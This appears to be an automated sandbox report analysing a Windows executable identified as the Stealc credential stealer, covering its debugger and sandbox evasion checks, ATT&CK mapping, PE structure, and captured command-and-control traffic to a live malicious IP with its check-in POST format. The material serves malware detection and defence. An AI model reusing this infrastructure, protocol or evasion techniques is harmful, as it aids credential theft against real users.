                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003245C0 VirtualProtect ?,00000004,00000100,000000000_2_003245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00339860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00339860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00339750 mov eax, dword ptr fs:[00000030h]0_2_00339750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00337850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6500, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00339600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00339600
                Source: file.exe, file.exe, 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: !Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00337B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00336920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00336920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00337850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00337850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00337A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00337A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6500, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.320000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6500, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php8afile.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpRfile.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php%:file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpu:file.exe, 00000000.00000002.1735801152.00000000010C6000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37file.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://185.215.113.37/lawfile.exe, 00000000.00000002.1735801152.00000000010D8000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37W$file.exe, 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1532751
                            Start date and time:2024-10-13 21:39:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 1s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 81%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 82
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948654946980613
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'815'040 bytes
                            MD5:9c8851494e85a86a1b823868d2ec5b1b
                            SHA1:dbf8f81d9c9bfb1ae8ad0cd1d5bad9a6d0dd41c5
                            SHA256:3a69f6d29dee1aec39e1a81e574b7dcebe2e3ee08f2d36117a2bc19d8e279e14
                            SHA512:9a3927d3fc6fc8f7d59041b8d4dd5d5b3740e71fb07a28d109d44bb16c84deb53b015f162795289322180e2151370acc596b5eb14c5071df494ec8a0f4fa28b3
                            SSDEEP:49152:pKQM2W0k94KIOxqeqnEh62hU2d3XW/AJDH:pSUflsqEhvU1/Wr
                            TLSH:998533302877E23DC93D0E342686A78A96BCC3599C137F19785B7E5A10D70A821B9DDF
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xa87000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FD3C51DC6CAh
                            seto byte ptr [ebx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [edx+ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            or byte ptr [eax+00000000h], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            pop es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800e339f1f39e3e6e1e7458bf9148d06baaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2930000x20094bcc77104458130dc55e50ec24443bfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            mmvujlrd0x4f10000x1950000x19500073b6fae786ceffb1e52af6da1d7eae24False0.9949291087962963data7.953824912705421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            youucsdu0x6860000x10000x4001cb22b464560e6f2eb9658b8845b0a8bFalse0.7998046875data6.112458813829965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6870000x30000x2200ecde58828f1aed1d3adcb89adbb688d9False0.06410845588235294DOS executable (COM)0.7510811429342507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-13T21:40:06.485545+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 13, 2024 21:40:05.529895067 CEST4973080192.168.2.4185.215.113.37
                            Oct 13, 2024 21:40:05.535093069 CEST8049730185.215.113.37192.168.2.4
                            Oct 13, 2024 21:40:05.535196066 CEST4973080192.168.2.4185.215.113.37
                            Oct 13, 2024 21:40:05.535751104 CEST4973080192.168.2.4185.215.113.37
                            Oct 13, 2024 21:40:05.540678978 CEST8049730185.215.113.37192.168.2.4
                            Oct 13, 2024 21:40:06.247569084 CEST8049730185.215.113.37192.168.2.4
                            Oct 13, 2024 21:40:06.247654915 CEST4973080192.168.2.4185.215.113.37
                            Oct 13, 2024 21:40:06.249881029 CEST4973080192.168.2.4185.215.113.37
                            Oct 13, 2024 21:40:06.254956007 CEST8049730185.215.113.37192.168.2.4
                            Oct 13, 2024 21:40:06.485419989 CEST8049730185.215.113.37192.168.2.4
                            Oct 13, 2024 21:40:06.485544920 CEST4973080192.168.2.4185.215.113.37
                            Oct 13, 2024 21:40:10.176556110 CEST4973080192.168.2.4185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730185.215.113.37806500C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 13, 2024 21:40:05.535751104 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 13, 2024 21:40:06.247569084 CEST203INHTTP/1.1 200 OK
                            Date: Sun, 13 Oct 2024 19:40:06 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 13, 2024 21:40:06.249881029 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFH
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 32 38 38 36 36 38 38 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 2d 2d 0d 0a
                            Data Ascii: ------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="hwid"8C28866889272029741119------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="build"doma------CAAAFCAKKKFBFIDGDBFH--
                            Oct 13, 2024 21:40:06.485419989 CEST210INHTTP/1.1 200 OK
                            Date: Sun, 13 Oct 2024 19:40:06 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:15:40:03
                            Start date:13/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x320000
                            File size:1'815'040 bytes
                            MD5 hash:9C8851494E85A86A1B823868D2EC5B1B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1735801152.000000000107E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1694461519.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
                              execution_graph 13128 3369f0 13173 322260 13128->13173 13152 336a64 13153 33a9b0 4 API calls 13152->13153 13154 336a6b 13153->13154 13155 33a9b0 4 API calls 13154->13155 13156 336a72 13155->13156 13157 33a9b0 4 API calls 13156->13157 13158 336a79 13157->13158 13159 33a9b0 4 API calls 13158->13159 13160 336a80 13159->13160 13325 33a8a0 13160->13325 13162 336b0c 13329 336920 GetSystemTime 13162->13329 13164 336a89 13164->13162 13166 336ac2 OpenEventA 13164->13166 13168 336af5 CloseHandle Sleep 13166->13168 13169 336ad9 13166->13169 13170 336b0a 13168->13170 13172 336ae1 CreateEventA 13169->13172 13170->13164 13172->13162 13526 3245c0 13173->13526 13175 322274 13176 3245c0 2 API calls 13175->13176 13177 32228d 13176->13177 13178 3245c0 2 API calls 13177->13178 13179 3222a6 13178->13179 13180 3245c0 2 API calls 13179->13180 13181 3222bf 13180->13181 13182 3245c0 2 API calls 13181->13182 13183 3222d8 13182->13183 13184 3245c0 2 API calls 13183->13184 13185 3222f1 13184->13185 13186 3245c0 2 API calls 13185->13186 13187 32230a 13186->13187 13188 3245c0 2 API calls 13187->13188 13189 322323 13188->13189 13190 3245c0 2 API calls 13189->13190 13191 32233c 13190->13191 13192 3245c0 2 API calls 13191->13192 13193 322355 13192->13193 13194 3245c0 2 API calls 13193->13194 13195 32236e 13194->13195 13196 3245c0 2 API calls 13195->13196 13197 322387 13196->13197 13198 3245c0 2 API calls 13197->13198 13199 3223a0 13198->13199 13200 3245c0 2 API calls 13199->13200 13201 3223b9 13200->13201 13202 3245c0 2 API calls 13201->13202 13203 3223d2 13202->13203 13204 3245c0 2 API calls 13203->13204 13205 3223eb 13204->13205 13206 3245c0 2 API calls 13205->13206 13207 322404 13206->13207 13208 3245c0 2 API calls 13207->13208 13209 32241d 13208->13209 13210 3245c0 2 API calls 13209->13210 13211 322436 13210->13211 13212 3245c0 2 API calls 13211->13212 13213 32244f 13212->13213 13214 3245c0 2 API calls 13213->13214 13215 322468 13214->13215 13216 3245c0 2 API calls 13215->13216 13217 322481 13216->13217 13218 3245c0 2 API calls 13217->13218 13219 32249a 13218->13219 13220 3245c0 2 API calls 13219->13220 13221 3224b3 13220->13221 13222 3245c0 2 API calls 13221->13222 13223 3224cc 13222->13223 13224 3245c0 2 API calls 13223->13224 13225 3224e5 13224->13225 13226 3245c0 2 API calls 13225->13226 13227 3224fe 13226->13227 13228 3245c0 2 API calls 13227->13228 13229 322517 13228->13229 13230 3245c0 2 API calls 13229->13230 13231 322530 13230->13231 13232 3245c0 2 API calls 13231->13232 13233 322549 13232->13233 13234 3245c0 2 API calls 13233->13234 13235 322562 13234->13235 13236 3245c0 2 API calls 13235->13236 13237 32257b 13236->13237 13238 3245c0 2 API calls 13237->13238 13239 322594 13238->13239 13240 3245c0 2 API calls 13239->13240 13241 